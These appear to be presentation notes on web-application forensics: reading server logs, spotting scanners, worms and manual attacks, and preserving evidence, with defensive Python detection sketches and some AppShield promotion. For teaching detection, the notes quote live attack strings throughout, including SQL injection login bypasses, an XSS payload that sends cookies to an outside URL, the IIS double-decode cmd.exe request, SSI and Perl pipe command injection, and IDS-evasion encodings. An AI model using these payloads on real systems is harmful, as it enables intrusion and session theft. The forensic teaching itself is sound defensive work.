In the process of learning about WWW forensics, you will also gain an understanding of:
How to use initial inspection to determine if you were attacked
How to determine if an attack continues. If it does, what steps to take to eliminate it.
The actual attacks and the magnitude of damage they can cause (to later assess the damage)
How to take preventive actions for future occurrences
Assessing and repairing the damage
Let’s just look at the facts:
Code Red infected 359,000 servers in less than 14 hours. At its peak, it infected more than 2,000 new hosts per minute. Estimated cost: $2.6B.
Within 24 hours of Nimda hitting, 50% of the infected hosts went offline, including some of the largest financial, retail and government organizations in the world.
According to the FTC, $18 billion in sales is expected to be lost due to concerns about online security in 2002
And most disturbing, according to a survey published in April 2002 by San Francisco's Computer Security Institute and the FBI, 90% of the 503 security professionals surveyed (most of whom work for large corporations and government agencies) use firewalls and anti-virus solutions at their companies, and 60% use intrusion detection systems. Yet 90% still suffered security breaches in 2001, including virus infections, Web site vandalism, credit card fraud and theft of company secrets. The most expensive breaches were cases of financial fraud, causing an average loss of $4.6 million. 85% were attacked by Internet worms like Code Red and Nimda, causing an average financial loss of $283,000 from a single worm attack. Finally, a staggering 97% of web applications audited by Sanctum Inc. were found vulnerable to application-level attacks.
Each layer of the application has its own unique vulnerabilities. A vulnerability fixed at one layer may still be exploited at another layer. An exploit at any layer of the application affects the integrity and behavior of the entire application.
Definition of computer forensics from New Technologies Inc
"Computer Forensics involves the preservation, identification, extraction and documentation of computer evidence stored in the form of magnetically encoded information (data)."
Forensics is used for a variety of things including identifying and repairing damage, identifying the source of the damage in order to eliminate it, and aiding in legal action.  The field of computer forensics is vast.  This presentation will take an in-depth look into one of the less well known areas, WWW forensics.
WWW forensics applies to the world of the Internet and Web sites. Specifically, it means looking at and understanding your network topology and Web application topology: your network devices, such as mail servers, firewalls, and FTP servers, and the application layer, including web servers, application servers, front-end and back-end servers, databases, and the security you have at the application layer.
In today's Web-enabled world, Web forensics has become an increasingly critical component of Internet security. With 75% of hacks happening at the application layer, according to John Pescatore of the Gartner Group, the need to quickly understand what happened, how it can be prevented or eliminated, and how to recover from what has been done is growing in importance.
Damage control
What was the target of the attack?
Was it successful?
How far did it go?
Countermeasures
Who is the attacker?
Can I prosecute?
What evidence do I have?
Prevention
How do I stop it from happening again?
Logs are imperfect:
Most logs do not store 100% of the information:
They may not contain much HTML data since most info is related to the requested URL.
This is what makes WWW-hacking forensics so hard (at least at the application level).
Default configurations are often even more incomplete (Missing critical fields)
HTTP headers (cookies among them) are often not logged by default. In such cases, HTTP-level attacks such as HTTP header overflows, cookie poisoning, or even the Microsoft IIS/5.0 “Translate: f” show-source vulnerability look no different from other “valid” requests, because they differ from valid requests only in their HTTP headers.
Special characters may not be displayed correctly
One problem with reading log files is that they are textual, so special characters that were sent and logged, such as NULL and CRLF, are not displayed correctly. This helps anti-IDS attacks, which aim to confuse the log reader or the process monitoring the logs, such as an IDS.
To make the log file as thorough and informative as possible, remember to turn on all possible log entries, such as date/time, client IP address, query, all possible HTTP headers, and if possible (usually it is not) the body of the requests.
Web servers have their own root directory and own all the files and data in this directory.  Putting sensitive data in the root directory can put it at risk.  If a hacker gains control of the Web server process/daemon they can gain control of all data in the root directory. 
The best way to prevent detection is to remove the evidence.  Hackers know this and will do what they can to cover their tracks.
Keeping the log files in remote locations minimizes a hacker's ability to access them.
Make sure that special control characters are sanitized before they are passed to the log files.  The best way to do this is to scrub them before they are accepted as input.
The Web server owns and updates the log files.  Clever hackers will try to trick the Web server into altering the recorded data by throwing encoded backspace and delete characters into the URL.
Other special characters can be used to attack log files at the OS level by tricking the Web server into issuing commands that alter, remove, or otherwise damage system log files.
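As a minimal sketch of the sanitizing step described above, the Python below escapes control characters so that they show up in the log as visible text instead of acting on it. The function name sanitize_for_log and the \xNN escape style are assumptions made for illustration; the notes do not prescribe a specific scheme, and rejecting such input outright is an equally valid choice.

```python
from urllib.parse import unquote


def sanitize_for_log(value: str) -> str:
    """Replace control characters with visible hex escapes before logging."""
    out = []
    for ch in value:
        code = ord(ch)
        if ch == "\\":
            out.append("\\\\")              # escape the escape character itself
        elif code < 0x20 or code == 0x7F:   # NULL, CR, LF, backspace, DEL, ...
            out.append(f"\\x{code:02x}")
        else:
            out.append(ch)
    return "".join(out)


# Hypothetical request path carrying encoded CRLF, backspace and NULL.
requested = unquote("/index.html%0d%0aFAKE%08%00")
print(sanitize_for_log(requested))  # /index.html\x0d\x0aFAKE\x08\x00
```

Because the backslash itself is escaped, an attacker cannot forge an escape sequence that looks like one written by the logger.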
IMAGE – hacker trying to reach for a cookie jar (labeled log files) on a shelf out of reach
Uses a browser….
And scanning tools – tailor made automatic tools…..
Password grinding, cookie collecting/spoofing
Will usually start with an automatic scanner to see what is available, fast
And home made tools….
May use several IPs, hide behind a proxy server
Manual methods –
typically using a browser
Manual phase is “sparse” – you see attacks once a minute or so, interwoven with “normal” browsing
Application specific attacks
A lot of experimenting
Anti-IDS techniques
Long process – can take days – but the attacker has the time
Rapid sequence of attacks over short period of time
Single IP source
Usually HTTP, not HTTPS
Common web vulnerabilities – not application specific
A lot of 404 pages
Usually grouped by subject, sometimes alphabetically sorted...
No real session (not maintaining cookies), but may maintain HTTP authentication
May be correlated with attacks on non-HTTP ports
Download an evaluation version of a commercial or freeware scanner to see the footprint it leaves in your logs
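The scanner traits listed above (a rapid sequence of requests, a single source IP, a lot of 404 pages) can be sketched as a simple sliding-window check. This is an illustration under stated assumptions, not a tuned detector: the record layout (ip, timestamp in seconds, status code), the function name scanner_suspects, and both thresholds are hypothetical.

```python
from collections import defaultdict, deque


def scanner_suspects(records, window_seconds=60, min_404s=20):
    """Return IPs that produced at least min_404s 404 responses within one window.

    records is an iterable of (ip, timestamp_seconds, status) tuples.
    """
    recent = defaultdict(deque)   # per-IP timestamps of recent 404 responses
    suspects = set()
    for ip, ts, status in sorted(records, key=lambda r: r[1]):
        if status != 404:
            continue
        window = recent[ip]
        window.append(ts)
        # Drop 404s that fell out of the time window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) >= min_404s:
            suspects.add(ip)
    return suspects
```

Running an evaluation scanner against a test site and feeding its log through a check like this is one way to pick realistic thresholds.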
Somewhat similar to downgraded scanners
So far, unlike scanners, worms attempt only a few dozen HTTP attacks.
Does not perform HTTP authentication
Every batch is from a single IP, yet expect several “sessions” from different IPs (lots of machines are infected).
Attack may be correlated to non-HTTP protocols
So, where do you begin when you think you may have been hacked?
First, follow these three principles to maintain the integrity of the evidence you collect:
1. Acquire the evidence without altering or damaging the original.
2. Authenticate that your recovered evidence is the same as the originally seized data.
3. Analyze the data without modifying it.
With these principles in mind, using initial inspection,
Determine if you are still under attack
If the attack continues, take immediate steps to prevent it or eliminate its impact
Apply forensics: understand the attacks and their magnitude (to later assess the damage)
Take preventive actions for future occurrences
Assess and repair damage
Gather litigation evidence as recovering stolen or damaged assets may require some type of legal action against the offending party.
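The second principle above (authenticate that recovered evidence matches the original) is commonly handled by recording a cryptographic digest at acquisition time and comparing it later. The sketch below assumes SHA-256 and uses hypothetical function names; the notes do not name a specific hash or tool.

```python
import hashlib


def sha256_of_file(path, chunk_size=65536):
    """Compute the SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:          # read-only: never modify evidence
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_unaltered(path, recorded_digest):
    """Return True if the file still matches the digest recorded at acquisition."""
    return sha256_of_file(path) == recorded_digest
```

A typical use is to hash each log file when it is copied off the server, store the digests separately, and run the comparison on the working copy before and after analysis.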
What is going on here? Can you tell?
Now it's clear. In this session, there is a brute-force password-guessing attack on the login form.
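A brute-force attack on a login form tends to show up as many POST requests to the same login URL from one source. The sketch below counts such requests per IP in Common Log Format lines. The login path /login.asp, the threshold, and the function names are assumptions for illustration; since POST bodies are usually not logged, the request count is the only signal used here.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def login_attempts(lines, login_path="/login.asp"):
    """Count POST requests to login_path per client IP."""
    counts = Counter()
    for line in lines:
        match = CLF.match(line)
        if not match:
            continue
        ip, method, target, _status = match.groups()
        if method == "POST" and target.split("?")[0] == login_path:
            counts[ip] += 1
    return counts


def brute_force_suspects(lines, login_path="/login.asp", threshold=10):
    """Return the sorted IPs with at least threshold login POSTs."""
    counts = login_attempts(lines, login_path)
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```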
Before looking into what was done against the application, you first have to identify it. This means taking a good look through the logs of the various network and application components to identify any behavior that falls outside the norm and may be a hacking attempt.
Check the system resources: memory usage, CPU consumption, process tables, disk space, log size, checksums and file time stamps, unusual temp files.
Check network usage: firewall, network load, increased usage from one or several sources.
Examine the log files: system, application, network, web.
Translate: f – nonstandard HTTP header.
Request #4208 – nonstandard HTTP method – SEARCH. Likely to be an attack attempt. Note that there is no Referer and no session is maintained – scanner.
Request #4218 – nonstandard HTTP header – “Translate: f”. Indicates an attack attempt (revealing source code in Microsoft IIS/5.0). Note the backslash appended to the script name. Note that there is no Referer, no session is maintained, and the attack is site specific (it relies on /search2.aspx) – a hand-crafted attack using a non-browser tool.
Anything which is not a good, simple and valid path in your application is suspicious.
POST parameters appear in the body of the request, hence are not logged by web servers.
Note that the attacks are not site specific – the script names are not taken from the site.
Note that this is a manual attack. The first link is the original request. The hacker focuses on the file parameter, playing with it and modifying it until he/she understands its behavior. Then, the last three requests are actual attacks. Note the use of .. and %00. Note that the session is maintained (TCP, ASINFO) since the attacker uses the browser, but the Referer is not present.
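The two markers called out above, .. and %00, can be searched for in logged parameter values. The following is a minimal sketch with a hypothetical function name. It decodes the value once before checking, so it will not catch double-encoded variants.

```python
from urllib.parse import unquote


def traversal_indicators(value: str) -> list:
    """Return the traversal-style markers found in one parameter value."""
    decoded = unquote(value)
    found = []
    # Treat both slash styles as separators and look for a ".." path element.
    if ".." in decoded.replace("\\", "/").split("/"):
        found.append("directory traversal")
    if "\x00" in decoded:
        found.append("null byte")
    return found


# Hypothetical values for a "file" parameter.
print(traversal_indicators("report.html"))
print(traversal_indicators("../../etc/passwd%00.html"))
```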
#4594 – a simple login request. uid=aaa & passw=bbb
#4602 – a probe. uid=' & passw=
#4605 – a fuller probe. Having received the error page of the above, the attacker wants to find out exactly how his/her input is processed. Hence uid=aaa'bbb & passw=ccc
#4607 – the full attack. uid=' or 1=1 or username=' & passw=
Note the SQL fragment or 1=1 or username=
Note Referer exists, session is maintained, attack is application specific.
Note that this is a POST request – web servers simply don’t log the parameters!!!
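If request bodies are captured by some means (an application-level log or a security gateway, for example), the probes above can be flagged with a few patterns. This is a rough sketch, assuming a URL-encoded form body; the pattern list and the function name are illustrative and far from complete, and a lone quote will also match legitimate input such as names containing an apostrophe.

```python
import re
from urllib.parse import parse_qsl

SQL_PROBE_PATTERNS = [
    re.compile(r"'"),                                    # stray single quote
    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.IGNORECASE),  # or 1=1
    re.compile(r"--"),                                   # SQL comment marker
    re.compile(r"\bunion\b\s+\bselect\b", re.IGNORECASE),
]


def suspicious_params(body: str) -> dict:
    """Return the form parameters whose decoded value matches a probe pattern."""
    flagged = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if any(pattern.search(value) for pattern in SQL_PROBE_PATTERNS):
            flagged[name] = value
    return flagged


print(suspicious_params("uid=aaa&passw=bbb"))
print(suspicious_params("uid=%27+or+1%3D1+or+username%3D%27&passw="))
```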
Note: Event trace diagrams focus on showing the flow of an event over time between all the involved parties. Each party is depicted as a vertical arrow pointing downwards (time runs from top to bottom), and an event is shown by the larger arrows between parties.
#1 – "><script>alert(document.cookie)</script>
#2 – "><img src="javascript:window.open('http://...?cookie='+document.cookie)">
#3, #4 – " style=background:url(javascript:...) "
#5 – <script>alert(111)</script>
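The payloads above share a few recognizable fragments: a script tag, a javascript: URL, and a reference to document.cookie. A minimal sketch of flagging them in logged parameter values follows. The pattern list and function name are assumptions, and real attacks use many more variations than these three patterns cover.

```python
import re
from urllib.parse import unquote_plus

XSS_PATTERNS = [
    re.compile(r"<\s*script", re.IGNORECASE),      # opening script tag
    re.compile(r"javascript\s*:", re.IGNORECASE),  # javascript: pseudo-URL
    re.compile(r"document\.cookie", re.IGNORECASE),
]


def looks_like_xss(value: str) -> bool:
    """Return True if the URL-decoded value contains a known script fragment."""
    decoded = unquote_plus(value)
    return any(pattern.search(decoded) for pattern in XSS_PATTERNS)
```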
Example
Remote command execution (IIS double decode bug): /scripts/..%255c..%255cwinnt/system32/cmd.exe?dir+c:\
and a few thousand more...
Can also span HTTP headers and script parameters
Variations:
suspicious encoding of script extension - /script%2ejsp  /script.js%70  /script%252ejsp
appending characters to script name - /script.asp::$DATA  /script.pl+.htr  /script.pl%20
using extensions for temporary/backup copies - /script.old  /script.pl~  /script.$$$  /script.pl.tmp  /script.pl.sav
uppercase extensions - /script.JSP
8.3 file name format - /longsc~1.jsp
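Each variation listed above can be matched with a simple pattern on the request path. The sketch below is illustrative only: the labels, the patterns, and the function name classify_script_name are assumptions, and the checks cover just the examples given on this slide.

```python
import re

CHECKS = [
    ("encoded character in script name", re.compile(r"%[0-9a-fA-F]{2}")),
    ("NTFS stream suffix", re.compile(r"::\$DATA$", re.IGNORECASE)),
    ("appended .htr", re.compile(r"\+\.htr$", re.IGNORECASE)),
    ("backup or temporary extension",
     re.compile(r"(\.old|\.tmp|\.sav|~|\.\$\$\$)$", re.IGNORECASE)),
    ("uppercase extension", re.compile(r"\.[A-Z]+$")),
    ("8.3 short file name", re.compile(r"~\d+\.")),
]


def classify_script_name(path: str) -> list:
    """Return the labels of every suspicious variation found in a request path."""
    return [label for label, pattern in CHECKS if pattern.search(path)]


for sample in ("/script.jsp", "/script%252ejsp", "/script.asp::$DATA", "/longsc~1.jsp"):
    print(sample, classify_script_name(sample))
```

The path is checked in its raw, undecoded form on purpose: the encoding itself is the signal.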
Using HTTP header logging, you can (even in Apache) log X-Forwarded-For and Client-IP.
Note that the TCP source of this circuit is 10.1.1.52, but this is a proxy; the actual source is 192.168.112.12.
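Once those headers are logged, the likely origin of a proxied request can be read from them. The sketch below prefers the first X-Forwarded-For entry, then Client-IP, then the TCP source. The function names are hypothetical, and because these headers are supplied by the client or the proxy they can be forged, so the result is a lead rather than proof.

```python
import ipaddress


def _valid_ip(text: str) -> bool:
    """Return True if text parses as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def probable_client_ip(tcp_source: str, headers: dict) -> str:
    """Pick the most likely originating address for a logged request."""
    lowered = {name.lower(): value for name, value in headers.items()}
    # X-Forwarded-For may hold a comma-separated chain; the first entry
    # is the address the first proxy saw.
    first_hop = lowered.get("x-forwarded-for", "").split(",")[0].strip()
    if _valid_ip(first_hop):
        return first_hop
    client_ip = lowered.get("client-ip", "").strip()
    if _valid_ip(client_ip):
        return client_ip
    return tcp_source


print(probable_client_ip("10.1.1.52", {"X-Forwarded-For": "192.168.112.12"}))  # 192.168.112.12
```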
Anti-IDS attacks are designed to sneak past an IDS. An IDS looks for specific patterns or strings, and it is easy to modify the attack string so that the IDS does not recognize the attack.
Premature request ending:
Some IDSs do not inspect the whole request, only the part up to the first HTTP/1.0, while the web server parses the whole request. The IDS is tricked into thinking the request is GET / HTTP/1.0, but the web server sees the full request: GET /%20HTTP/1.0%0d%0aHeader:%20/../../cgi-bin/some.cgi HTTP/1.0. That path contains two directories followed by a traversal back up to the /cgi-bin directory.
These are rather well-known techniques, and signatures can be written for most of them. But you have to know a technique before you can write a signature for it. Most attacks of this type will still get through most security systems and never be seen.
These serve as examples of variations on the same attack. Combining any of these attacks, adding characters (/ . \), or encoding ASCII values changes the attack pattern and can fool an IDS.
Anti-IDS techniques.
This is an Apache 1.3.x log. AppShield's logs cannot be used here because the request is made canonical and logged as such, so almost all of the requests below are converted to /cgi-bin/
/cgi-bin/ - regular
HEAD /cgi-bin/ - using HEAD instead of GET (not useful here, as this is a directory)
/foobar/../cgi-bin/ - use naive ..
cgi-bin – bad URL (not starting with /)
//////////////cgi-bin/
/foobar/%2e%2e/cgi-bin/ - .. URL encoded
/./././././././cgi-bin/
/./././././././cgi-bi%6E/ - “n” URL encoded
/%252e/cgi-bin/ - “.” double encoded
/%c0%ae/cgi-bin/ - “.” overlong UTF-8 representation
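One way to see through these variations is to reduce every path to a canonical form before comparing it with signatures, and to treat any request whose raw path differs from its canonical form as suspicious. The sketch below is a simplified illustration, not a description of how AppShield or any IDS works: it decodes percent-encoding repeatedly, folds two-byte overlong UTF-8 sequences, collapses repeated slashes, and resolves . and .. elements. All function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote_to_bytes


def fold_overlong(raw: bytes) -> bytes:
    """Map two-byte overlong UTF-8 sequences (0xC0/0xC1 lead) to the ASCII byte."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(path: str, max_rounds: int = 5) -> str:
    """Return the path a permissive server might resolve the request to."""
    raw = path.encode("utf-8")
    for _ in range(max_rounds):            # repeat to undo double encoding
        decoded = fold_overlong(unquote_to_bytes(raw))
        if decoded == raw:
            break
        raw = decoded
    text = raw.decode("latin-1")
    normalized = posixpath.normpath("/" + text.lstrip("/"))
    if text.endswith("/") and normalized != "/":
        normalized += "/"                  # keep the directory marker
    return normalized


def is_evasive(path: str) -> bool:
    """True when the raw path is not already in canonical form."""
    return canonicalize(path) != path


for sample in ("/cgi-bin/", "/foobar/%2e%2e/cgi-bin/", "/%252e/cgi-bin/", "/%c0%ae/cgi-bin/"):
    print(sample, "->", canonicalize(sample), is_evasive(sample))
```

Every variation in the list above reduces to /cgi-bin/ under this sketch, and only the first, regular request is reported as non-evasive.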
Once the IP addresses of infected or vulnerable hosts have been identified, the IP addresses must be resolved to host names. The ports and physical locations of the hosts must also be identified. If the infected machine is a production machine with a static IP address, chances are that you know where to find it. If it is a laptop that gets its IP address dynamically, it can be considerably more difficult to find it or its owner. Use company network information to assist with locating the infected machines.
If it is not a production machine, you may not have rights to the machine. NBTSTAT can find the machine name given an IP address. DNS lookups can gather machine names for you, as can the WINS database and the DHCP database. Doing name lookups manually is effective only in small outbreaks. If hundreds of machines are involved, the task becomes time consuming and error prone when done manually. Here too, any documented network information may help significantly.
Find what is infected or vulnerable. With Code Red II, signatures were known, and tools were available that could be run to determine if a system was infected and vulnerable. Various antivirus companies offer tools that can identify Code Red/II infected machines.
Let’s look at an AppShield log screenshot depicting a Code Red worm attack. All of the red lines indicate Code Red attempts stopped by AppShield. Note that we log both the legal and illegal requests, giving you the most comprehensive view of your application in the market today. Finally, what you are looking at are full online forensics that provide 24x7 insight into all activity on the site, giving you the confidence and information needed to ensure your system is meeting the requirements set for it while in production.
Note: illegal hex format (%uHHHH) is logged by AppShield.
The request looks innocent, BUT:
1. Bad cookie is reported
2. No Referer, no session
44 – SSI injection (<!--#exec "/bin/ls" -->)
52, 54 – Perl interpreter under virtual root (/cgi-bin/perl.exe) invocation. No parameters (yet...)
53 – Perl pipe exploit (file=|/bin/ls /home/admin/)
54 – 57 – starting sequence of Nimda. Invocation of cmd.exe /c dir
#14 – buffer overflow in the path element.
#27 – buffer overflow in a parameter.
#35 – evasive buffer overflow in HTTP header (Accept-Language). Will not be logged in regular web server logs.
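All three overflow attempts above stand out by length: an oversized path element, parameter value, or header value. Assuming headers are available from some source other than the default web server log, a length check can be sketched as follows. The limits and the function name are placeholders to be tuned per application, not recommended values.

```python
from urllib.parse import parse_qsl, urlsplit


def oversized_fields(url, headers, max_segment=255, max_param=1024, max_header=1024):
    """Return (kind, name, length) for each field longer than its limit.

    kind is "path", "parameter" or "header"; name is empty for path elements.
    """
    findings = []
    parts = urlsplit(url)
    for segment in parts.path.split("/"):
        if len(segment) > max_segment:
            findings.append(("path", "", len(segment)))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) > max_param:
            findings.append(("parameter", name, len(value)))
    for name, value in headers.items():
        if len(value) > max_header:
            findings.append(("header", name, len(value)))
    return findings
```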